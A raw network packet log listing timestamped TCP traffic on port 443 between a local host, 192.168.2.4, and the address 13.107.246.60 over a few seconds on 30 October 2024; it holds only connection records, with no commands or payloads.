                                                Oct 30, 2024 00:23:03.321111917 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.321255922 CET58149443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.321631908 CET58149443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.321644068 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.326522112 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.327152014 CET58148443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.327202082 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.327646017 CET58148443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.327662945 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.335885048 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.336091995 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.336188078 CET58145443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.336349010 CET58145443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.336380005 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.336468935 CET58145443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.336484909 CET4435814513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.341674089 CET58150443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.341717005 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.341792107 CET58150443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.341911077 CET58150443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.341938019 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.418344975 CET4435814613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.418431997 CET4435814613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.418519974 CET58146443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.419004917 CET58146443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.419022083 CET4435814613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.422910929 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.425184965 CET58151443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.425210953 CET4435815113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.425337076 CET58151443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.425700903 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.425765038 CET58151443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.425777912 CET4435815113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.425827980 CET58147443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.425960064 CET58147443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.425976992 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.426024914 CET58147443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.426035881 CET4435814713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.431560993 CET58152443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.431646109 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.431809902 CET58152443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.432146072 CET58152443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.432184935 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.463350058 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.464212894 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.464309931 CET58148443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.464478016 CET58148443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.464517117 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.464582920 CET58148443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.464598894 CET4435814813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.470134020 CET58153443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.470156908 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:03.470283031 CET58153443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.470695019 CET58153443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:03.470707893 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.080760956 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.081933022 CET58149443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.081957102 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.083332062 CET58149443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.083337069 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.105699062 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.106653929 CET58150443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.106697083 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.107047081 CET58150443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.107091904 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.160299063 CET4435815113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.160937071 CET58151443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.160957098 CET4435815113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.162235022 CET58151443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.162239075 CET4435815113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.210531950 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.217250109 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.217329025 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.217539072 CET58149443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.219669104 CET58153443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.219681978 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.221141100 CET58153443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.221148968 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.221704960 CET58149443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.221721888 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.221734047 CET58149443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.221739054 CET4435814913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.225464106 CET58154443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.225532055 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.225737095 CET58154443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.225990057 CET58154443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.226021051 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.240473032 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.240618944 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.240726948 CET58150443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.240933895 CET58150443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.240969896 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.240995884 CET58150443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.241025925 CET4435815013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.254863024 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.254909992 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.254990101 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.255152941 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.255171061 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.294605970 CET4435815113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.294677019 CET4435815113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.294837952 CET58151443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.295366049 CET58151443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.295378923 CET4435815113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.301984072 CET58156443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.302023888 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.302175045 CET58156443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.302639008 CET58156443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.302654028 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.325645924 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.326661110 CET58152443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.326688051 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.328001022 CET58152443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.328012943 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.350039005 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.350065947 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.350121021 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.350317001 CET58153443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.350828886 CET58153443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.350841045 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.350867033 CET58153443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.350873947 CET4435815313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.356800079 CET58157443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.356827974 CET4435815713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.356973886 CET58157443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.357340097 CET58157443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.357353926 CET4435815713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.600776911 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.600992918 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.601089001 CET58152443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.601531029 CET58152443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.601556063 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.601584911 CET58152443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.601602077 CET4435815213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.608632088 CET58158443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.608650923 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.608803988 CET58158443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.609210968 CET58158443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.609216928 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.974275112 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.974950075 CET58154443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.974977970 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.975518942 CET58154443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.975533009 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.996649981 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.997042894 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.997056961 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:04.997387886 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:04.997394085 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.049313068 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.049784899 CET58156443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.049801111 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.050110102 CET58156443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.050113916 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.097713947 CET4435815713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.098216057 CET58157443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.098238945 CET4435815713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.098623991 CET58157443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.098629951 CET4435815713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.117937088 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.118020058 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.118096113 CET58154443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.118304014 CET58154443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.118333101 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.118356943 CET58154443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.118369102 CET4435815413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.121773005 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.121803999 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.121891975 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.122117996 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.122133017 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.129775047 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.129909992 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.129971981 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.129987001 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.130027056 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.130079985 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.130136967 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.130151987 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.130162954 CET58155443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.130168915 CET4435815513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.132611036 CET58160443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.132630110 CET4435816013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.132709980 CET58160443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.132913113 CET58160443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.132929087 CET4435816013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.184179068 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.184299946 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.184371948 CET58156443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.184473038 CET58156443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.184482098 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.184494019 CET58156443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.184498072 CET4435815613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.186938047 CET58161443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.186996937 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.187099934 CET58161443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.187266111 CET58161443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.187297106 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.229007006 CET4435815713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.229125023 CET4435815713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.229336977 CET58157443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.229336977 CET58157443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.230478048 CET58157443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.230487108 CET4435815713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.231750965 CET58162443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.231777906 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.231848955 CET58162443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.231996059 CET58162443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.232007980 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.343271971 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.343852997 CET58158443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.343863010 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.344285011 CET58158443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.344289064 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.473428965 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.473515034 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.473594904 CET58158443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.473803997 CET58158443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.473817110 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.473831892 CET58158443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.473836899 CET4435815813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.477293968 CET58163443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.477360010 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.477461100 CET58163443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.477657080 CET58163443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.477686882 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.859771967 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.860892057 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.860907078 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.861289978 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.861294985 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.909913063 CET4435816013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.910711050 CET58160443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.910736084 CET4435816013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.911252975 CET58160443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.911264896 CET4435816013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.919111967 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.919972897 CET58161443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.920036077 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.929203033 CET58161443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.929224014 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.963203907 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.963797092 CET58162443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.963812113 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.964466095 CET58162443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.964473009 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.991970062 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.992182970 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.992221117 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.992275000 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.992404938 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.992887974 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.992906094 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:05.992952108 CET58159443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:05.992959023 CET4435815913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.000875950 CET58164443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.000902891 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.001065016 CET58164443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.001462936 CET58164443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.001477957 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.045469046 CET4435816013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.045600891 CET4435816013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.045691013 CET58160443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.046120882 CET58160443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.046137094 CET4435816013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.050339937 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.050374985 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.050498009 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.050869942 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.050880909 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.054785013 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.054857969 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.054941893 CET58161443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.055175066 CET58161443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.055208921 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.055253983 CET58161443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.055269003 CET4435816113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.061213017 CET58166443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.061239958 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.061383963 CET58166443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.061825037 CET58166443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.061844110 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.112735987 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.112817049 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.112941980 CET58162443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.113389015 CET58162443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.113399982 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.113430977 CET58162443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.113436937 CET4435816213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.119965076 CET58167443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.119982004 CET4435816713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.120146990 CET58167443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.120507956 CET58167443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.120527029 CET4435816713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.213833094 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.215008020 CET58163443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.215063095 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.216377974 CET58163443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.216394901 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.343550920 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.343592882 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.343637943 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.343919992 CET58163443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.344557047 CET58163443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.344594002 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.344628096 CET58163443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.344643116 CET4435816313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.351913929 CET58168443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.352022886 CET4435816813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.352262974 CET58168443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.352631092 CET58168443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.352672100 CET4435816813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.793081999 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.794008017 CET58164443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.794020891 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.794682026 CET58164443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.794687986 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.802474976 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.802936077 CET58166443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.802944899 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.804100037 CET58166443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.804105043 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.832648993 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.833440065 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.833462954 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.834121943 CET58165443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.834126949 CET4435816513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.844137907 CET4435816713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.844749928 CET58167443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.844758034 CET4435816713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.845896959 CET58167443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.845901966 CET4435816713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.934293985 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.934597969 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.934706926 CET58164443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.935218096 CET58164443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.935230970 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.935260057 CET58164443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.935265064 CET4435816413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.942168951 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.942240000 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.942356110 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.942658901 CET58169443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.942692041 CET4435816913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.947380066 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.947504044 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.947560072 CET58166443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.947673082 CET58166443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.947678089 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.947694063 CET58166443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:06.947698116 CET4435816613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:06.950339079 CET58170443192.168.2.413.107.246.60
